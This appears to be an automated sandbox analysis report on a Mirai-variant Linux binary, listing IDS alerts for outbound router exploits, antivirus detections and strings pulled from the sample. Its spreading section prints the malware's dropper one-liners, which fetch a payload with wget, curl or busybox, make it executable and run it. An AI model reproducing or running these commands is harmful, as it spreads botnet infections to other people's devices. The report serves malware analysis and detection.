                            2024-12-06T00:37:44.844994+010020290341Web Application Attack192.168.2.2357504141.90.6.14949152TCP
                            2024-12-06T00:37:44.845725+010020290341Web Application Attack192.168.2.234264817.68.94.13980TCP
                            2024-12-06T00:37:44.863925+010020290341Web Application Attack192.168.2.2340008169.186.142.16880TCP
                            2024-12-06T00:37:44.864296+010020290341Web Application Attack192.168.2.233886657.217.97.23080TCP
                            2024-12-06T00:37:44.917357+010020290341Web Application Attack192.168.2.2352932137.140.180.4349152TCP
                            2024-12-06T00:37:44.919932+010020290341Web Application Attack192.168.2.235602262.2.31.8880TCP
                            2024-12-06T00:37:44.920302+010020290341Web Application Attack192.168.2.2346606220.220.238.849152TCP
                            2024-12-06T00:37:45.868879+010020290341Web Application Attack192.168.2.233846096.84.106.935555TCP
                            2024-12-06T00:37:45.869618+010020290341Web Application Attack192.168.2.233554823.24.1.16080TCP
                            2024-12-06T00:37:45.886696+010020290341Web Application Attack192.168.2.235025490.127.51.1517574TCP
                            2024-12-06T00:37:45.909954+010020290341Web Application Attack192.168.2.23328686.70.46.1698080TCP
                            2024-12-06T00:37:45.910322+010020290341Web Application Attack192.168.2.2333470131.76.152.1388080TCP
                            2024-12-06T00:37:45.911423+010020290341Web Application Attack192.168.2.234288859.215.116.13149152TCP
                            2024-12-06T00:37:45.916505+010020290341Web Application Attack192.168.2.2335250120.181.234.19880TCP
                            2024-12-06T00:37:45.919420+010020290341Web Application Attack192.168.2.235451817.19.142.17580TCP
                            2024-12-06T00:37:45.926339+010020290341Web Application Attack192.168.2.2347428102.34.229.758080TCP
                            2024-12-06T00:37:45.933247+010020290341Web Application Attack192.168.2.23340926.79.28.20580TCP
                            2024-12-06T00:37:46.837122+010020290341Web Application Attack192.168.2.2357372192.106.15.498080TCP
                            2024-12-06T00:37:46.838088+010020290341Web Application Attack192.168.2.2357276120.29.235.480TCP
                            2024-12-06T00:37:46.845726+010020290341Web Application Attack192.168.2.234437830.49.69.1615555TCP
                            2024-12-06T00:37:46.896249+010020290341Web Application Attack192.168.2.2335868195.224.177.238080TCP
                            2024-12-06T00:37:46.898456+010020290341Web Application Attack192.168.2.233496685.216.218.558080TCP
                            2024-12-06T00:37:46.899193+010020290341Web Application Attack192.168.2.2337422120.5.156.9680TCP
                            2024-12-06T00:37:46.901375+010020290341Web Application Attack192.168.2.23607843.253.116.23280TCP
                            2024-12-06T00:37:46.902119+010020290341Web Application Attack192.168.2.2345566213.217.112.1815555TCP
                            2024-12-06T00:37:46.903954+010020290341Web Application Attack192.168.2.2342286151.98.201.687574TCP
                            2024-12-06T00:37:47.845218+010020290341Web Application Attack192.168.2.2336880176.28.20.1107574TCP
                            2024-12-06T00:37:47.869515+010020290341Web Application Attack192.168.2.236064016.126.113.5380TCP
                            2024-12-06T00:37:47.870166+010020290341Web Application Attack192.168.2.233717229.124.224.205555TCP
                            2024-12-06T00:37:47.921040+010020290341Web Application Attack192.168.2.2354770179.87.36.277574TCP
                            2024-12-06T00:37:48.849568+010020290341Web Application Attack192.168.2.2334298106.58.97.4380TCP
                            2024-12-06T00:37:48.866624+010020290341Web Application Attack192.168.2.2360904199.56.161.20749152TCP
                            2024-12-06T00:37:48.877540+010020290341Web Application Attack192.168.2.2345944139.60.238.13080TCP
                            2024-12-06T00:37:48.881219+010020290341Web Application Attack192.168.2.2359772116.218.8.1395555TCP
                            2024-12-06T00:37:48.897242+010020290341Web Application Attack192.168.2.2342702134.87.227.8280TCP
                            2024-12-06T00:37:48.897713+010020290341Web Application Attack192.168.2.2337372116.235.110.918080TCP
                            2024-12-06T00:37:48.929622+010020290341Web Application Attack192.168.2.2338620153.75.171.2105555TCP
                            2024-12-06T00:37:48.944174+010020290341Web Application Attack192.168.2.235793098.2.203.907574TCP
                            2024-12-06T00:37:49.656875+010020290341Web Application Attack192.168.2.2339336112.120.244.23680TCP
                            2024-12-06T00:37:49.849508+010020290341Web Application Attack192.168.2.235842620.241.173.7149152TCP
                            2024-12-06T00:37:49.851349+010020290341Web Application Attack192.168.2.23358305.111.53.20280TCP
                            2024-12-06T00:37:49.851722+010020290341Web Application Attack192.168.2.235823297.40.54.2037574TCP
                            2024-12-06T00:37:49.866272+010020290341Web Application Attack192.168.2.234827640.184.62.11480TCP
                            2024-12-06T00:37:49.877171+010020290341Web Application Attack192.168.2.2350534201.234.54.16849152TCP
                            2024-12-06T00:37:49.879761+010020290341Web Application Attack192.168.2.2333838202.134.81.2008080TCP
                            2024-12-06T00:37:49.880134+010020290341Web Application Attack192.168.2.234184083.130.81.1007574TCP
                            2024-12-06T00:37:49.889972+010020290341Web Application Attack192.168.2.236077037.102.109.12549152TCP
                            2024-12-06T00:37:49.937659+010020290341Web Application Attack192.168.2.234041222.102.138.1338080TCP
                            2024-12-06T00:37:49.943476+010020290341Web Application Attack192.168.2.2354114116.6.239.1055555TCP
                            2024-12-06T00:37:49.943854+010020290341Web Application Attack192.168.2.233662223.62.238.147574TCP
                            2024-12-06T00:37:50.836699+010020290341Web Application Attack192.168.2.233340433.176.226.180TCP
                            2024-12-06T00:37:50.872296+010020290341Web Application Attack192.168.2.235012489.171.214.7949152TCP
                            2024-12-06T00:37:50.874859+010020290341Web Application Attack192.168.2.234933053.85.29.7980TCP
                            2024-12-06T00:37:50.881398+010020290341Web Application Attack192.168.2.2360636128.169.60.1597574TCP
                            2024-12-06T00:37:50.882131+010020290341Web Application Attack192.168.2.2347210103.29.190.1777574TCP
                            2024-12-06T00:37:50.888678+010020290341Web Application Attack192.168.2.234033040.161.115.848080TCP
                            2024-12-06T00:37:50.913757+010020290341Web Application Attack192.168.2.234751285.233.173.1865555TCP
                            2024-12-06T00:37:51.846057+010020290341Web Application Attack192.168.2.234385889.209.200.1580TCP
                            2024-12-06T00:37:51.852600+010020290341Web Application Attack192.168.2.2341550202.167.33.2157574TCP
                            2024-12-06T00:37:51.865765+010020290341Web Application Attack192.168.2.234972670.95.140.515555TCP
                            2024-12-06T00:37:51.866500+010020290341Web Application Attack192.168.2.233860042.25.58.22580TCP
                            2024-12-06T00:37:51.867604+010020290341Web Application Attack192.168.2.235339494.18.186.24280TCP
                            2024-12-06T00:37:51.875640+010020290341Web Application Attack192.168.2.2359744144.219.209.2249152TCP
                            2024-12-06T00:37:51.892021+010020290341Web Application Attack192.168.2.234440820.192.54.698080TCP
                            2024-12-06T00:37:51.892389+010020290341Web Application Attack192.168.2.234421230.169.244.4749152TCP
                            2024-12-06T00:37:51.901885+010020290341Web Application Attack192.168.2.2346612220.55.179.6880TCP
                            2024-12-06T00:37:51.920526+010020290341Web Application Attack192.168.2.233343043.228.53.2387574TCP
                            2024-12-06T00:37:52.854356+010020290341Web Application Attack192.168.2.2360928219.172.167.23249152TCP
                            2024-12-06T00:37:52.880888+010020290341Web Application Attack192.168.2.2334082187.24.223.9580TCP
                            2024-12-06T00:37:52.895084+010020290341Web Application Attack192.168.2.23441805.90.227.15880TCP
                            2024-12-06T00:37:52.896544+010020290341Web Application Attack192.168.2.234936233.158.189.107574TCP
                            2024-12-06T00:37:52.900927+010020290341Web Application Attack192.168.2.2349564213.203.3.1927574TCP
                            2024-12-06T00:37:52.909030+010020290341Web Application Attack192.168.2.233544018.7.31.23849152TCP
                            2024-12-06T00:37:52.909401+010020290341Web Application Attack192.168.2.2346036158.87.81.1655555TCP
                            2024-12-06T00:37:52.911951+010020290341Web Application Attack192.168.2.234108841.217.83.2415555TCP
                            2024-12-06T00:37:52.938889+010020290341Web Application Attack192.168.2.2351388157.118.15.1605555TCP
                            2024-12-06T00:37:53.837799+010020290341Web Application Attack192.168.2.234918442.34.149.558080TCP
                            2024-12-06T00:37:53.846913+010020290341Web Application Attack192.168.2.2347748125.101.103.1345555TCP
                            2024-12-06T00:37:53.907252+010020290341Web Application Attack192.168.2.2345222214.131.241.6580TCP
                            2024-12-06T00:37:53.913434+010020290341Web Application Attack192.168.2.2345946151.165.125.2068080TCP
                            2024-12-06T00:37:53.917076+010020290341Web Application Attack192.168.2.2350108138.219.83.10480TCP
                            2024-12-06T00:37:53.921441+010020290341Web Application Attack192.168.2.2357386102.231.30.2375555TCP
                            2024-12-06T00:37:53.924360+010020290341Web Application Attack192.168.2.234375867.6.149.38080TCP
                            2024-12-06T00:37:53.937804+010020290341Web Application Attack192.168.2.2339726121.115.59.1217574TCP
                            2024-12-06T00:37:54.839940+010020290341Web Application Attack192.168.2.2343964113.210.221.11249152TCP
                            2024-12-06T00:37:54.865340+010020290341Web Application Attack192.168.2.2343654148.131.165.3980TCP
                            2024-12-06T00:37:54.870820+010020290341Web Application Attack192.168.2.235244444.156.127.19849152TCP
                            2024-12-06T00:37:54.871194+010020290341Web Application Attack192.168.2.234353287.103.58.817574TCP
                            2024-12-06T00:37:54.873742+010020290341Web Application Attack192.168.2.2343950137.99.92.1517574TCP
                            2024-12-06T00:37:54.924703+010020290341Web Application Attack192.168.2.2356314151.209.199.18080TCP
                            2024-12-06T00:37:54.929089+010020290341Web Application Attack192.168.2.23492085.165.147.1357574TCP
                            2024-12-06T00:37:55.858528+010020290341Web Application Attack192.168.2.2338188129.130.35.1055555TCP
                            2024-12-06T00:37:55.858904+010020290341Web Application Attack192.168.2.23487023.187.63.1657574TCP
                            2024-12-06T00:37:55.872560+010020290341Web Application Attack192.168.2.2342880203.122.151.1545555TCP
                            2024-12-06T00:37:55.881280+010020290341Web Application Attack192.168.2.234052081.194.155.2357574TCP
                            2024-12-06T00:37:55.888555+010020290341Web Application Attack192.168.2.235436840.173.24.8880TCP
                            2024-12-06T00:37:55.901309+010020290341Web Application Attack192.168.2.235248263.42.193.557574TCP
                            2024-12-06T00:37:55.930076+010020290341Web Application Attack192.168.2.233797671.243.183.2485555TCP
                            2024-12-06T00:37:56.847554+010020290341Web Application Attack192.168.2.2355288142.163.233.1787574TCP
                            2024-12-06T00:37:56.859489+010020290341Web Application Attack192.168.2.2357152130.188.140.1118080TCP
                            2024-12-06T00:37:56.864943+010020290341Web Application Attack192.168.2.23374162.138.200.378080TCP
                            2024-12-06T00:37:56.889989+010020290341Web Application Attack192.168.2.234366246.217.77.1985555TCP
                            2024-12-06T00:37:56.903433+010020290341Web Application Attack192.168.2.23493785.39.52.15280TCP
                            2024-12-06T00:37:56.906353+010020290341Web Application Attack192.168.2.235663453.220.163.1107574TCP
                            2024-12-06T00:37:57.855967+010020290341Web Application Attack192.168.2.2347470109.183.98.2649152TCP
                            2024-12-06T00:37:57.858021+010020290341Web Application Attack192.168.2.2335564164.16.148.7480TCP
                            2024-12-06T00:37:57.890584+010020290341Web Application Attack192.168.2.2354980185.148.94.18949152TCP
                            2024-12-06T00:37:57.896397+010020290341Web Application Attack192.168.2.234554823.203.39.917574TCP
                            2024-12-06T00:37:57.896761+010020290341Web Application Attack192.168.2.2335108190.195.65.14280TCP
                            2024-12-06T00:37:57.936796+010020290341Web Application Attack192.168.2.2335340194.112.220.4649152TCP
                            2024-12-06T00:37:57.937166+010020290341Web Application Attack192.168.2.2354716151.253.19.648080TCP
                            2024-12-06T00:37:57.937898+010020290341Web Application Attack192.168.2.2343040158.236.246.508080TCP
                            2024-12-06T00:37:57.938992+010020290341Web Application Attack192.168.2.234626652.156.18.8180TCP
                            2024-12-06T00:37:58.833186+010020290341Web Application Attack192.168.2.2355232179.215.178.77574TCP
                            2024-12-06T00:37:58.839899+010020290341Web Application Attack192.168.2.233994670.111.160.2525555TCP
                            2024-12-06T00:37:58.845017+010020290341Web Application Attack192.168.2.235418259.184.68.2057574TCP
                            2024-12-06T00:37:58.876319+010020290341Web Application Attack192.168.2.234698273.178.79.195555TCP
                            2024-12-06T00:37:58.894150+010020290341Web Application Attack192.168.2.2357516209.134.136.17880TCP
                            2024-12-06T00:37:58.903575+010020290341Web Application Attack192.168.2.233857488.143.142.5049152TCP
                            2024-12-06T00:37:58.908329+010020290341Web Application Attack192.168.2.235265013.155.15.2208080TCP
                            2024-12-06T00:37:58.910844+010020290341Web Application Attack192.168.2.2351190113.160.60.555555TCP
                            2024-12-06T00:37:59.835834+010020290341Web Application Attack192.168.2.234523657.12.72.17080TCP
                            2024-12-06T00:37:59.865577+010020290341Web Application Attack192.168.2.235345295.197.13.1088080TCP
                            2024-12-06T00:37:59.869935+010020290341Web Application Attack192.168.2.2356736217.112.43.1797574TCP
                            2024-12-06T00:37:59.907153+010020290341Web Application Attack192.168.2.2339400141.12.109.20180TCP
                            2024-12-06T00:38:00.847007+010020290341Web Application Attack192.168.2.2338140202.33.3.22480TCP
                            2024-12-06T00:38:00.859012+010020290341Web Application Attack192.168.2.2346254135.88.227.1878080TCP
                            2024-12-06T00:38:00.874206+010020290341Web Application Attack192.168.2.2354796221.62.129.08080TCP
                            2024-12-06T00:38:00.923986+010020290341Web Application Attack192.168.2.2360830206.246.148.20880TCP
                            2024-12-06T00:38:01.842979+010020290341Web Application Attack192.168.2.2341770134.223.123.5280TCP
                            2024-12-06T00:38:01.858323+010020290341Web Application Attack192.168.2.2343646102.1.172.2380TCP
                            2024-12-06T00:38:01.907411+010020290341Web Application Attack192.168.2.233548663.185.179.2749152TCP
                            2024-12-06T00:38:01.907817+010020290341Web Application Attack192.168.2.235522093.71.112.22049152TCP
                            2024-12-06T00:38:01.928801+010020290341Web Application Attack192.168.2.235742663.190.31.16949152TCP
                            2024-12-06T00:38:02.840684+010020290341Web Application Attack192.168.2.2359788101.46.15.20749152TCP
                            2024-12-06T00:38:02.865950+010020290341Web Application Attack192.168.2.2340474115.113.7.537574TCP
                            2024-12-06T00:38:02.868875+010020290341Web Application Attack192.168.2.2338386121.151.89.2168080TCP
                            2024-12-06T00:38:02.875393+010020290341Web Application Attack192.168.2.2332940131.143.101.795555TCP
                            2024-12-06T00:38:02.898724+010020290341Web Application Attack192.168.2.236002259.113.95.375555TCP
                            2024-12-06T00:38:02.921738+010020290341Web Application Attack192.168.2.23419025.217.33.19349152TCP
                            2024-12-06T00:38:03.727091+010020290341Web Application Attack192.168.2.235321443.159.50.15480TCP
                            2024-12-06T00:38:03.836867+010020290341Web Application Attack192.168.2.2338764183.236.176.1288080TCP
                            2024-12-06T00:38:03.846375+010020290341Web Application Attack192.168.2.2346700176.67.235.20280TCP
                            2024-12-06T00:38:03.847846+010020290341Web Application Attack192.168.2.2341848180.106.114.78080TCP
                            2024-12-06T00:38:03.848249+010020290341Web Application Attack192.168.2.2346280118.214.95.458080TCP
                            2024-12-06T00:38:03.870673+010020290341Web Application Attack192.168.2.235697078.37.169.4180TCP
                            2024-12-06T00:38:03.903335+010020290341Web Application Attack192.168.2.234645421.243.154.15349152TCP
                            2024-12-06T00:38:03.921165+010020290341Web Application Attack192.168.2.2351124143.197.221.658080TCP
                            2024-12-06T00:38:03.940419+010020290341Web Application Attack192.168.2.2360502196.53.0.1125555TCP
                            2024-12-06T00:38:04.855243+010020290341Web Application Attack192.168.2.235614850.122.24.1535555TCP
                            2024-12-06T00:38:04.856333+010020290341Web Application Attack192.168.2.2349594195.140.232.875555TCP
                            2024-12-06T00:38:04.883038+010020290341Web Application Attack192.168.2.235533614.134.153.17680TCP
                            2024-12-06T00:38:04.891140+010020290341Web Application Attack192.168.2.2353204156.47.81.2228080TCP
                            2024-12-06T00:38:04.897400+010020290341Web Application Attack192.168.2.2348866132.171.47.18849152TCP
                            2024-12-06T00:38:04.922152+010020290341Web Application Attack192.168.2.2339962100.192.1.175555TCP
                            2024-12-06T00:38:04.929794+010020290341Web Application Attack192.168.2.2356218195.29.145.25080TCP
                            2024-12-06T00:38:04.937803+010020290341Web Application Attack192.168.2.2333756118.61.13.1608080TCP
                            2024-12-06T00:38:04.938902+010020290341Web Application Attack192.168.2.2354898142.238.188.25280TCP
                            2024-12-06T00:38:04.941082+010020290341Web Application Attack192.168.2.234437054.82.67.3149152TCP
                            2024-12-06T00:38:04.941809+010020290341Web Application Attack192.168.2.234358628.183.13.2438080TCP
                            2024-12-06T00:38:05.839018+010020290341Web Application Attack192.168.2.2343640161.39.199.21980TCP
                            2024-12-06T00:38:05.850107+010020290341Web Application Attack192.168.2.2343948111.73.240.178080TCP
                            2024-12-06T00:38:05.855787+010020290341Web Application Attack192.168.2.236012494.174.48.14480TCP
                            2024-12-06T00:38:05.892331+010020290341Web Application Attack192.168.2.2335642220.221.19.11580TCP
                            2024-12-06T00:38:05.894113+010020290341Web Application Attack192.168.2.23339964.31.247.15480TCP
                            2024-12-06T00:38:05.894500+010020290341Web Application Attack192.168.2.23383121.115.64.247574TCP
                            2024-12-06T00:38:05.899941+010020290341Web Application Attack192.168.2.233983281.78.199.549152TCP
                            2024-12-06T00:38:05.912079+010020290341Web Application Attack192.168.2.233772235.58.195.1637574TCP
                            2024-12-06T00:38:05.920427+010020290341Web Application Attack192.168.2.2353590201.139.58.23880TCP
                            2024-12-06T00:38:05.940389+010020290341Web Application Attack192.168.2.2343726174.191.128.1228080TCP
                            2024-12-06T00:38:05.945262+010020290341Web Application Attack192.168.2.23578141.48.207.18449152TCP
                            2024-12-06T00:38:06.914898+010020290341Web Application Attack192.168.2.233594252.18.43.1957574TCP

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Source: bin.sh.elfAvira: detected
                            Source: /usr/networksAvira: detection malicious, Label: EXP/ELF.Mirai.O
                            Source: bin.sh.elfReversingLabs: Detection: 65%

                            Spreading

                            barindex
                            Source: /tmp/bin.sh.elf (PID: 6255)Opens: /proc/net/routeJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6255)Opens: /proc/net/routeJump to behavior
                            Source: bin.sh.elfString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                            Source: bin.sh.elfString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
                            Source: bin.sh.elfString: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                            Source: networks.14.drString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                            Source: networks.14.drString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
                            Source: networks.14.drString: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'

                            Networking

                            barindex
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34104 -> 14.89.23.36:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47284 -> 213.33.239.153:5555
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:47336 -> 114.134.116.214:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47146 -> 112.185.80.51:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47630 -> 59.127.6.12:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:47630 -> 59.127.6.12:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51156 -> 84.240.86.160:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42184 -> 24.111.109.113:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53096 -> 43.79.133.11:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:47278 -> 98.35.241.78:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50372 -> 100.40.238.158:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34030 -> 86.51.139.199:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38788 -> 169.40.164.181:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46252 -> 1.98.140.42:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39370 -> 80.180.109.86:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:41790 -> 169.253.87.242:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37236 -> 159.226.179.189:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47338 -> 156.177.99.179:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42858 -> 110.77.244.54:49152
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:37388 -> 121.208.165.185:52869
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:37236 -> 159.226.179.189:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33724 -> 22.47.205.194:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:46736 -> 104.212.159.134:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44930 -> 48.71.73.50:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56874 -> 118.175.124.25:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:38788 -> 169.40.164.181:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60360 -> 144.192.196.181:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44962 -> 69.200.69.138:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36824 -> 117.116.60.186:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45060 -> 176.86.103.29:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60758 -> 178.165.8.79:7574
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:48816 -> 103.159.239.63:8080
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56874 -> 118.175.124.25:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:56448 -> 9.106.14.123:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58502 -> 85.46.119.84:5555
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:44516 -> 129.222.135.49:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:54494 -> 79.72.226.128:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49374 -> 204.19.175.144:49152
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:54806 -> 121.86.29.249:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:36750 -> 214.127.3.37:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:59716 -> 39.116.5.135:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57436 -> 57.194.223.241:5555
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:40472 -> 197.142.218.136:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59518 -> 199.176.49.4:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35532 -> 115.248.132.47:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45204 -> 63.218.221.150:49152
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:52544 -> 19.154.130.117:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36670 -> 108.175.170.193:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54214 -> 174.112.238.150:8080
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:52078 -> 191.245.227.83:52869
